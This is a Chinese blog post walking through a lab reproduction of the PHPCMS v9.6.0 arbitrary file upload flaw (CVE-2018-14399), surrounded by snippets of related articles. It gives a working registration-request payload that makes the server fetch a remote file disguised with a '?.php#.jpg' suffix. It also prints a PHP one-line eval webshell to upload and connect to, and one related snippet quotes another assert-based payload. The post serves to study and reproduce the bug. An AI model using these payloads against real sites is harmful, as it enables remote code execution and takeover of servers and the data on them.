phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399)

最新推荐文章于 2024-05-15 05:08:03 发布
最新推荐文章于 2024-05-15 05:08:03 发布
阅读量3k 收藏 5
点赞数
文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AgonYAN/article/details/125978993
版权

漏洞描述:

PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的校验。远程攻击者可以利用该漏洞上传并执行任意的PHP代码。

影响版本:phpcms v9.6.0

使用源码:phpcms_v9.6.0_UTF8

环境搭建就不说了,放一张搭建完的图

 访问前台,注册一个账号

 打开bp和代理,点击注册抓包。

在kali下,开启web服务,然后在web根目录下创建一个txt文件,写入

 

 构造POC:

siteid=1&modelid=10&username=test&password=123456&pwdconfirm=123456&email=1111%40qq.com&info[content]=<img src=http://192.168.226.129/phpinfo.txt?.php#.jpg>&dosubmit=1&protocol=

 

 不知道是我的POC写的有问题还是什么,没有回显文件位置,但是看文件目录是传进去了。

上传一句话木马。

<?php  @eval($_POST['pass']);?>

然后用工具链接就好

AgonYAN
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpcmsv9.0任意文件上传漏洞解析
01-19
POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1 Host: 192.168.0.109 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Fire...
phpcms v9.任意文件上传漏洞复现
newlife1441的博客
08-15 4581
如果你也出现上面的情况请试试下面说的方法:这里有一个小坑注意,你在压缩前面的文件时要注意他们在压缩文件中的顺序,意思就是你创建的一个php文件在创建的txt文件的上面就可以成功,只有这样在解压失败后它还是能够保留并将php文件成功解压出来。时间竞争漏洞利用原理其实就是在解压文件后与删除限制的文件之间的时间空隙来利用提前在限制的文件中写好的利用代码在非解压目录下生成新的不会被删除的新文件(木马),通过这个木马来拿下网站。原理:这里我们通过利用解压文件在解压过程出错会导致后面的递归删除操作不会执行的特点。...
最全PHPcms V9 任意文件上传漏洞_phpcmsv9漏洞(3),2024年最新闭关60天学懂NDK+物联网嵌入式
最新发布
2401_85015332的博客
05-15 341
漏洞爆出来的时间是2017年4月份左右,时间比较长了,存在任意文件长传,漏洞利用比较简单,危害很大,可以直接前台getshell。
代码审计学习phpcms头像上传漏洞
m0_46467017的博客
08-16 1195
究竟是什么原因造成了这个漏洞,究其根本还是以为你将用户不安全的POST数据写入了文件,并解压到web目录下了。世界上有无数种方法可以避免这个问题,web目录下随便写文件真的好吗?为何你不把压缩包放进tmp目录里,如果上传、解压缩的操作都能在tmp目录里完成,再把我们需要的头像文件拷贝到web目录中,还会有这么麻烦的安全问题吗?phpcms已经彻底抛弃了解压缩的方式,直接在前端将图片处理完成后进行上传。......
phpcms头像上传漏洞引发的故事
qq_68163788的博客
03-15 1611
PHPcms中存在一个头像上传漏洞,黑客可以利用这个漏洞上传恶意文件,比如Webshell,从而获取网站服务器的控制权。黑客通过Webshell开始操控网站服务器,窃取用户的个人信息、数据库信息甚至敏感的财务数据。黑客还可能利用服务器资源进行挖矿、发送垃圾邮件等恶意活动,给网站和用户带来严重的损失。 网站管理员在发现异常后赶紧封锁了黑客的访问,但已经造成了不可挽回的损失。为了修复漏洞和加强安全措施,网站管理员不得不花费大量时间和精力,重新设计和部署网站系统,修复漏洞并加强安全性,以防止类似事件再次发生。
phpcmsV9.6.0sql注入漏洞分析
shelter1234567的博客
09-11 1414
本次分析phpcmsV9.6.0 的sql注入漏洞,过程很曲折,就像cc链一样,要一步一步找到利用的链。纯手动分析没有软件调试,中间找类啊,方法啊 ,都是按照代码流程写的流程分析的,对自己也是一个挑战吧!
phpcms v9.6.0任意文件上传漏洞复现与原理分析(CVE-2018-14399)
不想当脚本小子的脚本小子
12-26 2867
一、漏洞描述 PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的校验。远程攻击者可以利用该漏洞上传并执行任意PHP代码。 二、漏洞影响版本 PHPCMS 9.6.0 三、漏洞环境搭建 1.解压下载的文件,然后把文件放到phpstudy的网站根目录下,浏览器访问127.0.0.1/phpcms/install/install.php,开始安装 在创..
phpcms-2008-CVE-2018-19127
03-18
phpcms-2008-CVE-2018-19127 最近,我们在phpcms 2008源代码的/type.php中发现了一个漏洞。当攻击者发送诸如“ /type.php?template=tag _(){}; @ unlink( FILE ); assert($ _ POST [1]); {//../ rss”之类的...
phpcms v9.6.0版本
09-09
phpcms v9.6.0版本】是一个重要的里程碑,它是phpcms内容管理系统的一个特定发行版,具有特定的安全性和功能特性。此版本被保留下来,主要是为了研究和学习目的,尤其是针对其中已知的安全问题——前台getshell...
PHPCMS v9.6.0 GBK
10-23
 版本v9.6.0 功能变更及bug修正说明: 适配php5.5 php5.6 php7安装改成使用mysqli模块,不在使用mysql模块,默认使用mysqli模块。升级用户不受影响string2array函数改成json处理,为了保持兼容函数名称没做变动后台...
PHPCMS v9.6.1 简体中文 UTF-8 正式版
12-01
PHPCMS简介 PHPCMS采用PHP5+MYSQL做为技术基础进行开发。PHPCMS V9采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,优秀的
phpcms上传漏洞
m0_70349048的博客
03-11 717
pspcms上传漏洞
【2】phpcms v9.6.0任意文件上传漏洞
司徒荆的博客
05-21 2542
phpcms v9.6.0任意文件上传漏洞
PHPCMSv9.6.0前端任意文件上传漏洞分析
红队是青春
01-29 821
PHPCMSv9.6.0前端任意文件上传漏洞代码分析
phpcms attachment.class.php,phpcms9.6.0任意文件上传漏洞CVE-2018-14399
weixin_42533243的博客
03-22 346
0x00:前言PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的校验。远程攻击者可以利用该漏洞上传并执行任意PHP代码。可以直接前台getshell。phpcms 9.6.00x01:漏洞测试1.1 浏览器访问前台注册会员1.2 点击注册按钮,用burp抓包发送到...
PHPCMS v9本地文件包含漏洞Getshell
fansenliangren的博客
12-01 1458
文件包含是指程序代码在处理包含文件的时候没有严格控制。导致用户可以构造参数包含远程代码在服务器上执行,并得到网站配置或者敏感文件,进而获取到服务器权限,造成网站被恶意删除,用户和交易数据被篡改等一系列恶性后果......
web安全-文件上传漏洞-某CMS及CVE编号文件上传漏洞测试以及实例讲解
ran的博客
01-27 1775
可以看到访问后可以实现上图所示的效果,因为我们这里上传的是普通图片,不是jsp代码,所以网页返回的是一堆乱码,如果我们上传的文件是jsp文件,网页就会返回isp代码执行后的内容。在网址内添加此路径进行搜索,在回显的页面内可以看到上传的文件成功以php的形式进行了执行(因为这里上传的是图片,且没有进行修改,所以返回的全部是乱码)。将“png”改为“php”后放包,正常在上传完文件之后,会返回一个文件的地址,但是这里地址没有显示,并出现了报错。按照搜索到的方法,将“png”改为“php”后放包。
phpcms 漏洞
erjian666的博客
11-02 2872
这个漏洞是某司的一位前辈发出来的,这里只是复现一下而已。 原文地址:https://www.t00ls.net/thread-39226-1-1.html 首先我们本地搭建一个phpcms9.6.0的环境 下载地址:http://www.mycodes.net/43/3365.htm   点击注册页面,进行抓包 在本地创建一个txt文本,写入一句话木马 POC s...
PHPCMS V9产品开发权威指南:快速入门与高级特性详解
"《PHPCMS-V9产品开发权威指南》是由盛大在线平台运营中心PHPCMS项目部于2011年3月编撰的一份详尽的文档,旨在帮助用户深入了解并掌握PHPCMS V9这款开源PHP网站内容管理系统。该指南共分为6个部分,涵盖了PHPCMS V9...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值